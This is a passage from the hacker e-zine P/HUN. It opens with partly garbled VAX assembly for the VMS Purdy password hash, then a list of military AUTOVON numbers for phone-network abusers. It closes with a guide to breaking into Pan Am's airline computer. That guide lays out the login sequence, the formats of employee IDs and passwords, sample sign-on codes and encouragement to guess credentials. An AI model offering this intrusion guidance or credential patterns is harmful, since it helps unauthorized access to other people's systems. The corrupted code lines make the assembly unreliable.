.LONG ^X06B6B51F4,^X04DB26158,^X05005713C,^X0EDB88320,^X0F00F9344
.LONG ^X0D6D6A3E8,^X0CB61B38C,^X09B64C2B0,^X086D3D2D4,^X0A00AE278
.LONG ^X0BDBDF21C
; Purdy polynomial co ffici`nts. Prime, but don't need to be
Purdy_Poly:
c:
.LONG -83,-1
.LONG -179,-1
.LONG -257,-1
.LONG -323,-1
.LONG -363,-1
.ENTRY LGI$HPWD,^M
MOVAQ @outdsc(AP),R4
MOVAQ @4(R4),R4
TSTB encrypt(AP)
BGTRU 10$
MNEGL #1,R0
MOVAQ @pwddsc(AP),R1
CRC autodin,R0,(R1),@4(R1)
CLRL R1
MOVQ R0,(R4)
BRB 20$
10$: CLRQ (R4)
MOVAQ @pwddsc(AP),R3
BSBB COLLAPSE_R2
ADDW2 salt(AP),3(R4)
MOVAQ @usrdsc(AP),R3
BSBB COLLAPSE_R2
PUSHAQ (R4)
CALLS #1,PURDY
20$: MOVL #1,R0
RET
COLLAPSE_R2:
MOVZWL (R3),R0
BEQL 20$
MOVAL @4(R3),R2
PUSHR #^M
MOVL R0,R1
5$: CMPB (R2)+,#32
BNEQ 7$
DECL R1
7$: SOBGTR R0,5$
MOVL R1,R0
POPR #^M
10$: BICL3 #-8,R0,R1
ADDB2 (R2)+,(R4)[R1]
SOBGTR R0,10$
20$: RSB
a=59
n0=1@24-3
n1=1@24-63
.ENTRY PURDY,^M
MOVQ @4(AP),-(SP)
BSBW PQMOD_R0
MOVAQ (SP),R4
MOVAQ PURDY_POLY,R5
MOVQ (R4),-(SP)
PUSHL #n1
BSBB PQEXP_R3
MOVQ (R4),-(SP)
PUSHL #n0-n1
BSBB PQEXP_R3
MOVQ (R5)+,-(SP)
BSBW PQADD_R0
BSBW PQMUL_R2
MOVQ (R5)+,-(SP)
MOVQ (R4),-(SP)
BSBW PQMUL_R2
MOVQ (R5)+,-(SP)
BSBW PQADD_R0
MOVQ (R4),-(SP)
BSBB PQMUL_R2
MOVQ (R5)+,-(SP)
BSBW PQADD_R0
MOVQ (R4),-(SP)
BSBB PQMUL_R2
MOVQ (R5)+,-(SP)
BSBW PQADD_R0
BSBW PQADD_R0
MOVQ (SP)+,@4(AP)
MOVL #1,R0
RET
PQEXP_R3:
POPR #^M
MOVQ #1,-(SP)
MOVQ 8+4(SP),-(SP)
TSTL 8+8(SP)
BEQL 30$
10$: BLBC 8+8(SP),20$
MOVQ (SP),-(SP)
MOVQ 8+8(SP),-(SP)
BSBB PQMUL_R2
MOVQ (SP)+,8(SP)
CMPZV #1,#31$8+8(S ),#
B BEQL 30$
20$: MOVQ (SP),-(SP)
BSBB PQMUL_R2
EXTZV #1,#31,8+8(SP),8+8(SP)
BRB 10$
30$: MOVQ 8(SP),8+8+4(SP)
MOVAQ 8+8+4(SP),SP
JMP (R3)
u=0
v=u+4
y=u+8
z=y+4
PQMOD_R0:
POPR #^M
CMPL v(SP),#-1
BLSSU 10$
CMPL u(SP),#-a
BLSSU 10$
ADDL2 #a,u(SP)
ADWC #0,v(SP)
10$: JMP (R0)
PQMUL_R2:
POPR #^M
MOVL SP,R2
PUSHL z(R2)
PUSHL v(R2)
BSBB EMULQ
BSBB PQMOD_R0
BSBB PQLSH_R0
PUSHL y(R2)
PUSHL v(R2)
BSBB EMULQ
BSBB PQMOD_R0
PUSHL z(R2)
PUSHL u(R2)
BSBB EMULQ
BSBB PQMOD_R0
BSBB PQADD_R0
BSBB PQADD_R0
BSBB PQLSH_R0
PUSHL y(R2)
PUSHL u(R2)
BSBB EMULQ
BSBB PQMOD_R0
BSBB PQADD_R0
MOVQ (SP)+,Y(R2)
MOVAQ Y(R2),SP
JMP (R1)
EMULQ:
EMUL 4(SP),8(SP),#0,-(SP)
CLRL -(SP)
TSTL 4+8+4(SP)
BGEQ 10$
ADDL2 4+8+8(SP),(SP)
10$: TSTL 4+8+8(SP)
BGEQ 20$
ADDL2 4+8+4(SP),(SP)
20$: ADDL2 (SP)+,4(SP)
MOVQ (SP)+,4(SP)
RSB
PQLSH_R0:
.ENABLE LSB
POPR #^M
PUSHL v(SP)
PUSHL #a
BSBB EMULQ
ASHQ #32,Y(SP),Y(SP)
BRB 10$
PQADD_R0:
POPR #^M
10$: ADDL2 u(SP),y(SP)
ADWC v(SP),z(SP)
BLSSU 20$
CMPL z(SP),#-1
BLSSU 30$
CMPL y(SP),#-a
BLSSU 30$
20$: ADDL2 #a,y(SP)
ADWC #0,z(SP)
30$: MOVAQ Y(SP),SP
JMP (R0)
.END
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume 2: Phile #4 of 11 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The Automatic Voice Network (AUTOVON) Outline PART I
----------------------------------------------------
Typed by: DareDevil
P/HUN Magazine Inc.
I am back from my long trip from London which turned out to be very intresting.
I met a couple of Hackers and Phreakers who were very willing to share
information with me. From what they say Hacking European Computers seems to be
an easy task.
Anyway.....
Heres something for you Silver Boxers. Hope this helps a little. The next 2
parts will continue in the later issues of P/HUN.
o--------------------------------------------------------------o
(To reach these installations from "DoD Numbers Only")
AUTOVON Listing Information Dial "0"
AUTOVON Access - Dail "8" Listen for the tone,then the AUTOVON Number
---------------------------------------------------------------------
INCOMING AUTOVON CODES
----------------------
COMMERCIAL AUTOVON | COMMERCIAL AUTOVON
-------------------------------------|-------------------------------------
227 Exchange 287 Plus four digits | 437 Exchange 364 Plus four digits
238 " 251 " | 475 " 335 "
272 " 285 " | 490 " 356 "
274 " 284 " | 576 " 291 "
282 " 292 " | 653 " 294 "
284 " 251 " | 692 " 222 "
285 " 356 " | 693 " 223 "
295 " 295 " | 694 " 224 "
325 " 221 " | 695 " 225 "
355 " 345 " | 696 " 226 "
373 " 243 " | 697 " 227 "
394 " 290 " | 746 " 286 "
427 " 291 " | 756 " 289 "
433 " 288 " | 763 " 293 "
463 " 296 " | 767 " 297 "
-------------------------------------+-------------------------------------
AUTOVON Access to The Pacific European-Carribean Area IS NOT available through
the DoD Exchanges. Theses calls must be placed through the appropriate Military
Switchboard serving your activity or by COML means.
ALABAMA
-------
Adj Gen Natl, Montgomery ........................................ 363-72XX
Oper Asst. 363-7210
Air Force Air Univ, Maxell AFB................................... 875-XXXX
Info Oper. 875-1110
Oper Asst. 436-3700
Air Natl Gd 117th Tac Recon Gp,Birmingham........................ 694-2XXX
Oper Asst. 694-2210
187th Tac Recon Gp, Montgomery.......................... 742-9XXX
Oper Asst. 485-9210
232nd Mob Comm Sqd, " ................................. 485-XXXX
Oper Asst. 742-9210
Anniston Army Depot.............................................. 571-XXXX
Oper Asst. 571-1110
Army Msl Cmd, Redstone Arsl...................................... 746-XXXX
Info Oper. 746-0011
Coast Guard Avn Spt Tng Cen, Mobile.............................. 436-3635
Def Contr Admin Svcs Mgt Area, Birmingham........................ 340-1XXX
Oper Asst. 340-1000
Fort McClellan, Anniston......................................... 865-XXXX
Oper Asst. 865-1110
Gunter AFB, Montgomery........................................... 446-XXXX
Oper Asst. 446-1110
Maxwell AFB, " .................................................. 875-XXXX
Info Oper. 875-1110
Mil Tfc Mgt Cmd (MTMC) EA Mob Det Gulf Outport Mobile............ 436-3830
Outport Mobile.................................................. 746-XXXX
Redstone Arsl,HUntsville......................................... 746-XXXX
Info Oper. 746-XXXX
U.S Property & Fiscal Ofc (USPFO) Natl Gd, Montgomery............ 363-7316
ALASKA
------
Adj Gen Natl Ge, Anchorage................................... 317-626-1299
Mil Actvities , Neklason Lake................................ 317-950-1211
Alaska Switch,Neklason Lake.................................. 317-950-1211
Cmdr in C Alaska (CINCAL), Elmendorf AFB..................... 317-552-3100
Oper Assit. 317-753-2228
Coast Guard COMCOGARD 17 Hq , Juneau......................... 317-388-7XXX
Oper Assit. 317-388-7011
Coast Guard Kodiak........................................... 317-487-5XXX
Oper Assit. 317-487-5888
Def Comm Agcy,Alaskan Region(DCA-AL) Elmendorf............... 317-552-XXXX
Oper Assit. 317-552-1110
Commander.............................................. 317-943-1212
Def Commercial Comm Ofc,Alaska,Elmendorf AFB........... 317-552-3132
Defense Fuel Region,Elmendorf AFB............................ 317-552-3760
Eielson AFB, Fairbanks....................................... 317-37X-XXXX
Info Oper Only. 317-372-1191
Elmendorf AFB,Anchorage...................................... 317-552-XXXX
Info. 317-552-1110
Oper Assit. 317-552-1110
Fed Avn Agcy - Alaskan Rdn Hg, Anchorage..................... 317-552-XXXX
Oper Assit. 317-552-1110
Comm Con Cen............................................ 317-552-1212
Fort Greely,Delta Junction................................... 317-87X-XXXX
Info Oper. 317-872-1113
Oper Assit. 317-864-0121
Fort Wainright, Fairbanks.................................... 317-35X-XXXX
Info Oper. 317-353-9113
Oper Assit. 317-353-9121
Nav Actvities,Adak........................................... 317-592-XXXX
Oper Assit. 317-592-0111
US Property & Fiscal Ofc (USPFO) Natl Gd, Ft Richardson...... 317-862-8116
ARIZONA
-------
A Comm-Hq,Ft Huachuca........................................... 879-XXXX
Oper Assit. 879-0111
USACC HQS EAC............................................... 626-1720
Adj Gen Natl Gd, Phoenix........................................ 853-8710
Air Natl Gd 161st Mil Airlift Gp, Phoenix....................... 853-8710
Oper Assit. 853-9210
David Monthan AFB, Tucson....................................... 361-XXXX
Oper Assit. 361-1110
Tac Cmd Post................................................ 626-1655
Def Contr Admin Svcs Mgt Area, Phoenix.......................... 940-XXXX
Oper Assit. 940-1110
Fort Huachuca, Sierra Vista..................................... 879-XXXX
Oper Assit. 879-0001
Luke AFB,Glendale............................................... 853-XXXX
Oper Assit. 853-1110
Cmd Post Duty Officer...................................... 727-3950
" ...................................... 626-1690
Marine Corps Air Sta, Yuma...................................... 951-XXXX
Oper Assit. 951-3011
Mil Acft Star & Disp Cen,Tucson................................. 361-XXXX
Oper Assit. 361-1110
Natl Gd State Maint Ofc, Phoenix................................ 853-8810
US Property & Fiscal Ofc (USPFO) Natl Gd, Phoenix............... 853-8821
Williams AFB, Chandler.......................................... 474-XXXX
Oper Assit. 474-1011
Yuma Proving Grounds............................................ 899-XXXX
Oper Assit. 899-1110
After Hours. 899-2020
1st Cbt Eval Gp Det 2 (SAC) Holbrook............................ 626-3430
ARKANSAS
--------
Adj Gen Natl Gd, Little Rock.................................... 731-5200
Air Natl Gd 188th Tac Recon Gp, Ft Smith........................ 962-8XXX
Blytheville AFB................................................. 721-XXXX
Oper Assit. 721-1110
Fort Chaffee,Ft Smith........................................... 962-2XXX
Oper Assit. 962-2111
Little Rock AFB................................................. 731-XXXX
Oper Assit. 731-1110
Pine Bluff Arsl................................................. 966-3XXX
Oper Assit. 966-3798
US Property & Fiscal Ofc(USPFO) Natl Gd,Little Rock............. 731-5253
CALIFORNIA
----------
Adj Gen Natl Gd, Sacramento..................................... 466-6531
Air Force Aero Sta, McClelland AFB.............................. 730-3760
Air Force Contr Mgr Div AFSC, Los Angeles AFS................... 833-1837
Oper Assit. 833-1110
Air Force Flt Test Cen,AFSC, Edwards AFB........................ 527-XXXX
Oper Assit. 527-0111
Air Force Satl Comm Fac Hq, Los Angeles......................... 833-XXXX
Oper Assit. 833-1110
Air Force Satl Test Ctr, Sunnyvale.............................. 359-3XXX
Oper Assit. 359-3110
144th Air Def Wg, Fresno.......................... 949-9XXX
Oper Assit. 949-9210
146th Mil Airlift Wg, Van Nuys.................... 873-6XXX
Oper Assit. 873-6310
148th Comm Sqd, Compton........................... 898-1895
149th Comm Sqd, Highlands......................... 633-2582
162nd Comm Gp, N Highlands........................ 633-2582
216 Equip & Inst Squd, Hayward.................... 462-5637
222nd Mob Comm Sqd, Costa Mesa.................... 833-0459
234th Mob Comm Sqd, Hayward....................... 462-1746
America Forces Radio & TV Svc, Los Angeles...................... 898-1746
Armed Forces Reserve Ctr, Los Angeles........................... 972-8XXX
Oper Assit. 972-8011
Army Audit Agcy Western Region, Sacramento...................... 839-2241
Oper Assit. 839-1110
Ballistic Sys Div Af Sys Cmd, Norton AFB........................ 876-XXXX
Oper Assit. 876-1110
Beale AFB, Marsville............................................ 368-XXXX
Oper Assit. 368-1110
Camp Pendelton Marine Corps Base,Oceanside...................... 365-XXXX
Oper Assit. 365-0111
Castle AFB, Merced.............................................. 347-XXXX
Oper Assit. 347-1110
Centerville Beach Nav Fac, Ferndale............................. 896-3381
Coast Guard COMCOGARD 11 Hq, Long Beach......................... 360-7961
12 Hq,(RCC Only), San Francisco................... 730-3471
Montery......................................................... 629-1561
Cmdr Submarine Flottilla Five, San Diego........................ 933-XXXX
Oper Assit. 933-1011
Def Conrt Admin Svcs Reg Svcs Reg/Mgt Area, Los Angeles......... 833-XXXX
Info Oper. 833-2226
Oper Assit. 833-1110
Def Contr Admin Svcs Mgt Area, Santa Ana........................ 873-2XXX
Oper Assit. 873-2700
San Diego.......................................... 542-XXXX
Oper Assit. 524-0111
Van Nuys........................................... 972-3XXX
Info Oper. 972-3319
San Francisco...................................... 466-9XXX
Info Oper. 466-9500
Defense Depot, Tracy............................................ 462-9XXX
Oper Assit. 462-9110
Def Fuel Region West San Pedro.................................. 833-2876
Def Language Institute, Presidio of Monterey.................... 929-XXXX
Oper Assit. 929-1110
Def Pers Spt Cen, Alameda....................................... 686-3006
Def Manpower Data Center, Monterey.............................. 878-2951
Edwards AFB..................................................... 527-XXXX
Info Oper. 527-0111
FAA Los Angeles Air Rt Trc Con Cen, Palmdale.................... 898-1290
FAA Oakland Air Rt Trf Con Cen, Fremont......................... 730-1595
Flt Air Con & Surv Fac (FACSFAC) TCC/OC Only, San Diego......... 727-3925
Flt Anal Cen, Corona............................................ 933-XXXX
Oper Assit. 933-0111
Flt Anti-Sub Warefare Sch, San Diego............................ 524-XXXX
Oper Assit. 524-0111
Fort Irwin, Barstow............................................. 470-XXXX
Oper Assit. 470-0111
Fort Mason, San Francisco....................................... 586-XXXX
Oper Assit. 586-1110
Fort Ord, Monterey.............................................. 929-XXXX
Oper Assit. 929-1110
George AFB, Victorville......................................... 353-XXXX
Oper Assit. 353-1110
German Mil Rep to USA/Cent Area, Long Beach NS.................. 360-0111
Letterman Genral Hospital, San Francisco........................ 586-XXXX
Oper Assit. 586-2231
Los Angeles AFS................................................. 833-XXXX
Oper Assit. 833-1110
Info Oper. 989-1780
MLP Oper. 838-XXXX
March AFB, Riverside............................................ 947-XXXX
Oper Assit. 947-1110
Marine Corps AirSta, El Toro.................................... 524-XXXX
Oper Assit. 997-3011
Rctg Depot, San Diego........................ 524-XXXX
Info Oper. 524-1011
Log Sup Base, Barstow........................ 282-XXXX
Oper Assit. 282-0111
Marine Corps Air Ground Combat 29 Palms.................... 952-5XXX/6XXX
Oper Assit. 952-6000
Mather AFB, Sacramento.......................................... 828-XXXX
Oper Assit. 828-1110
McClellan AFB, Sacramento....................................... 633-XXXX
Oper Assit. 633-1110
AUTODIN Tech Con, Sacramento..................... 730-1493
MCS Office Long Beach........................................... 360-6645
Mil Tfc Mgt Cmd (MTMC) WA HQ Oakland Army Base.................. 859-XXXX
Oper Assit. 859-0111
WA MOT Bat Area.................................. 859-XXXX
WA S/CA Outport SAn Pedro OPER Asst.............. 853-1650
MTMC WA MATCO Norton AFB CA...................... 876-XXXX
MTMC WA MATCO Norton AFB OPER Asst............... 876-1110
MTMC WA MATCO Travis AFB CA...................... 837-XXXX
MTMC WA MATCO Travis AFB OPER Asst............... 837-1110
Natl Gd State Maint Ofr, Sacramento............................. 466-6571
Oper Assit. 466-6605
Natl Parachute Test Range, El Centro............................ 958-8XXX
Oper Assit. 958-8212
Non-Duty Hours. 958-8547
Nav Air Sta, Alameda............................................ 686-0111
Imperial Beach................................... 951-0111
Lemoore.......................................... 949-0111
Miramir.......................................... 577-XXXX
Oper Assit. 577-1011
Moffett Fld, Sunnyvale........................... 462-0111
COM NAS North Island............................. 951-0111
Nav Amph Base - Coronado, San Diego............................. 577-XXXX
Oper Assit. 577-2011
Nav Comm Sta, NavOp Radio and Tele(NORATS), San Diego........... 958-3XXX
Oper Assit. 958-3011
San Francisco, Stockton........................... 466-7444
" " Tech Con, Stockton................. 730-1581
Nav Const Bn Cen, Port Hueneme.................................. 360-XXXX
Oper Assit. 360-4001
Cdmr Nav Base, San Diego.......................... 958-3011
Nav Hosp, Long Beach............................................ 873-9XXX
Oper Assit. 873-9011
Oakland........................................... 855-XXXX
Oper Assit. 855-5000
San Diego......................................... 522-6011
OIC of Navy Const, Mare Island.................................. 253-XXXX
Oper Assit. 253-2101
Mare Isl Vallejo.................................. 253-XXXX
Oper Assit. 253-0111
Nav Ocean Sys Ctr............................................... 553-XXXX
Oper Assit. 533-0111
Nav Shp Wpn Sys Engr Sta, Port Hueneme.......................... 360-XXXX
Oper Assit. 360-4711
Nav Sta, Long Beach............................................. 360-XXXX
Oper Assit. 360-0111
Nav Sta, San Diego.............................................. 958-XXXX
Oper Assit. 958-0111
Nav Sta, Treasure Island, San Francisco......................... 869-XXXX
Duty Off 869-6233
Oper Assit. 869-6411
Non Duty Hrs. 869-6233
Nav Sup Cen, Oakland............................................ 836-XXXX
Oper Assit.836-0111
Info Oper 836-4011
San Diego........................................ 522-XXXX
Oper Assit. 522-1011
Nav Tng Cen, San Diego.......................................... 524-XXXX
Oper Asst. 524-0111
Nav Tng Cmd Pac Fleet, San Diego................................ 524-XXXX
Oper Assit. 524-0111
NAVSURFPAC, San Diego........................................... 958-9XXX
Oper Assit. 958-9101
South Pac, Moffet Fld........................................... 462-XXXX
Oper Assit. 462-0111
Nav Wpns Cen China Lake......................................... 437-XXXX
Oper Assit. 437-9011
Nav Wpns Sta, Concord........................................... 253-5111
Nav Wpns Sta Steal Beach........................................ 873-7XXX
Oper Assit. 873-7000
Navy Post Grauduate School, Monterey............................ 878-XXXX
Oper Assit. 878-0111
Norton AFB, San Bernardino...................................... 876-XXXX
Oper Assit. 876-1110
AUTODIN Tech Con................................. 898-3944
Oakland Army Base............................................... 859-XXXX
Oper Assit. 859-0111
Pacific Msl Test Cen, Point Mugu................................ 351-XXXX
Oper Assit. 351-1110
Pasadena Fed Cen................................................ 879-5011
Point Sur Nav Fac, Big Sur...................................... 629-1470
Presidio of San Francisco....................................... 586-XXXX
Oper Assit. 586-1110
Rio Vista....................................................... 586-5837
Riverbank Army Ammo Plt......................................... 466-4100
Sacramento Air Log Cen.......................................... 633-XXXX
Oper Assit. 633-1110
Sacramento Army Depot........................................... 839-XXXX
Oper Assit. 839-1110
Sharpe Army Depot, Lathrop...................................... 462-2XXX
Oper Assit. 462-2011
Sierra Army Depot, Herlong...................................... 830-9XXX
Oper Assit. 830-9910
Space & Msl Sys Org, Los Angeles................................ 833-XXXX
Oper Assit. 898-1780
Travis AFB, Fairfield........................................... 837-XXXX
Oper Assit. 837-1110
22nd AF Tac Cmd Post............................ 730-1410
22nd AF Tac PBX................................. 869-3480
USPFO Natl Gd, San Luis Obispo.................................. 879-9201
Oper Assit. 878-9211
Vanderberg AFB, Lompox.......................................... 27X-XXXX
Oper Assit. 276-1110
West Div Nav Fac Engr Cmd, San Bruno............................ 859-XXXX
Oper Assit. 859-7111
6th Army Presidio of San Francisco.............................. 586-1110
15th Air Force wea Spt Unit, March AFB.......................... 727-1647
END OF PART 1
~~~~~~~~~~~~~~
The file is getting rather long and dont want to bore people with long lists
of numbers therefore, Part ][ & Part ]I[ will be on later issues of P/HUN
Online Magazine.
DareDevil at P/HUN Magazine Inc.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= P/HUN Issue #3, Volume 2: Phile #5 of 11 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
\ /
/ The Pan Am Airline Computer (c) 1994 "PART A" \
\ --------------------------------------------- /
/ \
\ By Red Knight /
/ \
\ A P/HUN Magazine Incorporation Productions. /
/ \
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
Introduction:
-------------
Ever wondered how the airline computers work? Well this article will inform
you as to various information,commands etc. The more you know about them the
more favors you can ask of them. I will go into details on how they go about
booking actual flights so you get an understanding on how its done. The article
will have actual outputs etc and explained in depth.
The best way to explain to first understand the PANAMAC computer. Then you
can go on and hack the main Pan Am computer because all the commands are the
same.
What is PANAMAC?:
----------------
PANAMAC are computers Pan Am's Sales Agent use for booking flights, answering
our various questions on arrivals,departures,visa etc.This is only a small
percentage of the questions.PANAMAC is full of info.
Where can you find answers to the these questions:
- What is a DH7 aircraft
- How many passengers were their in flight P2308 last month
- What will be the bus fair when traveling from Mombasa to Nairobi in Kenya
- What does SXR represent
- Information on carrying pets
- Where does one go for yellow fever shot in Kansas or anywhere in USA
- What is the departure tax from from anywhere in the world
- How many ciggerates is one allowed to take from USA to Pakistan
- Where to stay
- Which hotels?
- Weather conditions in a particular country
- Flight delays
Get my drift? Well the above questions can be answered using the PANAMAC.
PANAMAC is manufactured by ICOT.
Logging On to The Main Pan-Am Computer: (Not the PANAMAC )
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[This particular info on logging on was acquired from a Pan-Am employee]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the most hardest part of all. While logging on to the Pan Am computer
you will not see any type of an identifier. These system use E,7,1
characterists.
Enter as follows:
".Nodes" or ".N" then the Node Identifier:
The Node identifier:
~~~~~~~~~~~~~~~~~~~~
This part of info will contain the NPA a person is calling from and then
followed by a 7 digit access number in which last two are the state abb.
An example would be: 71811355NY
Its a high possiblity that the "11355" could be a zip code
The Person ID:
~~~~~~~~~~~~~~
After the Node Identifier enter:
.PI [ (NPA,8 Alpha Numeric Chracters which first being a letter)
Password
~~~~~~~~
The password is assigned to the employees which is supposed to be 6 to 8
characters alphanumeric with first being usually "P"
Enter Password using ".P" or ".PASSWORD" (No echo)
(After this you will get a long pause for about 1 min) Then if you guessed
wrong then it will log you off.
Your in!!!
~~~~~~~~~~
If you have made it so far then you are a hell of Hacker and you have my full
respect.
After you have entered correct information then you will get a message like
this:
Pan Am Airlines (4854.00PA)
Unauthorized Access will lead to a prosecution.
> ( This is the SOM Prompt)
(After that you will get a "SOM" prompt. Then from here on your home free.
The SOM is there for you. Almost all the commands in the PANAMAC will work
on their Main Computer.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
** NOTICE ,READ CAREFULLY **
From here on the article will deal with PANAMAC Airline Computer which your
sales agent uses to book you a flight and give you information.
You wont be able to call these up tho, but rather use the infomation provided
here when you hack the Main Pan-Am Airline Computer. (Process is described
above)
I repeat, all the commands are on The PANAMAC will work on the Main Computer.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Basic PANAMAC hardware:
-----------------------
A set consists of a display screen, standard type writer key board with row of
function keys along the top. There will also be a block of keys to the right
of the main key board and another block of keys to the far right.
I will explain almost all the keys on the board.The keyboard is a little
different from the regular IBM keyboards.
Basic Layout of a PANAMAC keyboard
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____________________________________________________________________________
| |
| +----------------------------------------------------------------------+ |
| | F U C T I O N K E Y S | |
| +----------------------------------------------------------------------+ |
| |
| +---------------------------------------+ +---------+ +---------------+ |
| | | | cursor | | | |
| | | | keys | | | |
| | | | Next | | PF 1-30 | |
| | Basic Keyboard with twin functions | | Part | | 15 keys | |
| | invoked by ALT + [Key] | | Delete | | | |
| | | | etc. | | | |
| | | | | | | |
| +---------------------------------------+ +---------+ +---------------+ |
|___________________________________________________________________________|
Here is a list that are used the most.The rest that I did not go into details
are almost never used.
(They can be invoked by using the ALT plus the approriate key)
For eg. The (CALC) - Use to get into calculator mode.
+------+
| Z |
ALT + +------+ ----> CALCULATOR MODE
| CALC |
+------+
(CHNG SCRN) - Changes from one screen to the second screen.
(CHANGE) - Used when changing name entries.
(RESET) - to reset the system.Eg. IF you are in the CALC mode to use this
return to regular mode.
(IGN) - Used to ignore any transaction made like when you enter something
for example in the PNR (Passenger Name & Record) and you dont wish to
save the current format you would use the IGN.
(XITN) -Cancel all itinerary in a PNR. The intinerary is the record of a flight
(ARNK) - Arrival not known.
(ET) - End Transaction. This store the the edited PNR.
(GFAX) - General FACTS. Info on passengers that Pan Am & other airlines need to
know.
(FAX) - Host FACTS. Info on passengers that only Pan Am needs to know.
(RMKS) - Remarks field to store misc info.
(RCVD) - Received filed. Name of person who made the booking.
(SEG) - Leave an open segment for a passenger who may want to return at an
unknown date but is sure that he/she will travel by Pan Am.
(IAS) - The "/" key is on the bottom of the keyboard. The letters "IAS" stand
for Insert After Segement (will be used later in the article).
(NAME) - Name of persons traveling eg. -3smith/sethmr/danmr/loydmr this is
an eg. of an entry made if three person seth, dan, loyd were travelling
a family obviosly having the same last name.
(DSPL) - Display a PNR, history, itin etc.
(CLEAR) - To clear the field that you are working in (To clear all fields press
ALT - CLEAR)..Doesn' delete any info.
(ALARM) - When you hear a "beep" use ALT-R (alarm) to clear the alarm.
(SOM) - Start of message.You will receive a new start of message.
(CLICK) - A toggel to switching on & off of the blinking of the cursor.
(RDUC) - Reduce fares.This is to view fares on senior citizen, students etc.
(ERASE) - A sort of a DEL key to delete the last character.
(SHIFT) - Used to toggle the second mode of the key.
(CALC) - To get to the calculator mode.
(END-I) - Used to display domestic fairs.
(END ITEM) - Used while inputing many name entries;Instead of using the .
(ENTER) - Self explanatory.
(EDIT FRMAT) - To transpose a copy from one field so another.
(NEXT PART) - Move the cursor from one field to another.
(INSERT CHAR) - Insert a character.
(DELETE CHAR) - Erase a character between a word and moves up the rest of the
word.
(INSERT LINE) - To Insert a line.
(DELETE LINE) - Self Exp. but cursor remains there.
(PART) - Just like the cursor keys UP,DOWN,RIGHT,LEFT.
(PF10) - To direct a command to the upper left field.
(PF11) - " " " " " " " right ".
(PF13) - " " " " " " bottom left ".
(PF14) - " " " " " " " right ".
Part II
~~~~~~~
SOM/CURSOR:
----------
When they first start, the screen is divided into 4 parts (dotted
line line sepating the four fields.Each of those four field
contains the SOM (this is PANAMAC prompt).The SOM looks like
an equilateral triangle pointing towards the right.The cursor
could be in any field or left of when last used.
In this article the I have characterized the SOM as ">"
Now to move to the next field one would use the "NEXT PART" key.
SINNING IN (LOGGING IN):
------------------------
In order to use the PANAMAC the all sales agents have to sine in.
Each user is assinged 2 things:
1) COLLINS SINE: - This is needed to sine in to the phone.
2) PANAMAC SINE: - This is needed to access the computer.
COLLINS SINE:
-------------
The COLLINS SINE is a code used to access the phone system to receive calls
and make calls.This serves as an unlocking device
The collins sine consists of 9 chracters.The first is always an asterisk the
next two are CAPITALS letters almost always (SI)
Here are some examples of COLLINS SINEs :
*SI340450
*SI409321
*SI345090
*SI430092
By sinning into the telphone is exactly what I mean. One would enter in thru
the touch tones (NOT THRU THE COMP)
So therefore *SI30450 one would would enter the * ,74 for SI then the rest
of the #s.
Heres how the telephone key PAD looks :
_________________________________________________________________
| ____________________________ _______ _______ _______ |
| | | | | | REL | |EMGY | | CW | |
| | | ABC | DEF | |_____| |_____| |______| |
| | 1 | 2 | 3 | |DAIL | |
| |________|________|________| |_____| |
| | | | | |SUPV | |
| | GHI | JKL | MNO | |_____| |
| | 4 | 5 | 6 | |
| |________|________|________| |
| | | | | |
| | PQR | TUV | WXY | |
| | 7 | 8 | 9 | |
| |________|________|________| _____ |
| | * | 0 | # | | IN | |
| |________|________|________| |_____| _____ |
| | AVI | | RPT | |
| |_____| |_____| |
|_______________________________________________________________|
Key Pad:
--------
IN - The IN key on the telephone key pad serves as a hold button the key will
blink when customer is on hold.
AVI - (Available) is depressed when the sales agent is available for the
next call.
RPT - [Unknown]
REL - (Release) Pushed when the sales agent doesn't want to be instantly
available for the next call. Depress AVI before releasing call.
DAIL - (out dail) - Depress the key and dial out. Method :
1) When asking for help 7714,7721,7713
2) Pantel (Used to call up the Pan Am airport) - 8XXX-XXXX
3) Local 212 Calls 9XXX-XXXX.
4) All others 8XXX-XXX-XXXX
SUPV - When the sales people ask for assistance
EMGY - This key is an important one. Suppose some one makes a bomb threat
this key is immediatly depressed and the conversation is recorded in
another room. The sales agents have been taught to keep them online
as much as they can.
CW - Will be used for Call Waiting in the future.
PANAMAC SINE:
-------------
The PANAMAC SINE in consists of 10 characters with BSIA (always) the first
four. The next four are all numbers and the last 2 are letters which could be
anything.
Examples:
BSIA0290KI
BSIA8534PO
BSIA3309DS
Procedure:
----------
This is the procedure they follow:
1) Sine in to the telephone - *SI
2) Sine out - *SO ( the SO stands for sining out)
3) Sine in the computer - [PAMAMAC SINE]
4) Sine into the telephone
Now the sales agent is ready to receive calls.
General Information Index:
--------------------------
PANAMAC contains most of the technical information that is needed by the
the service representatives.
To display (G)eneral (I)nformation (I)ndex you would input:
>KIINF followed by the first letter of the subject desired.
OUTPUT:
KIABLA - Albany Airport Info
KIATLA - Airport at Atlanta Georgia
KIAULA
KIABWA
KIBOSA
:
etc ...
:
KIZAQE
By just entering KIINF you would get all the KIINF Index from A to Z.
You can take it as if the KIINF is a root directory and its divided into
thousands of subdirectories.
The letter KI actually stands for `Key In` followed by the INF for
information.
For example if you wanted to display general information on car rentals
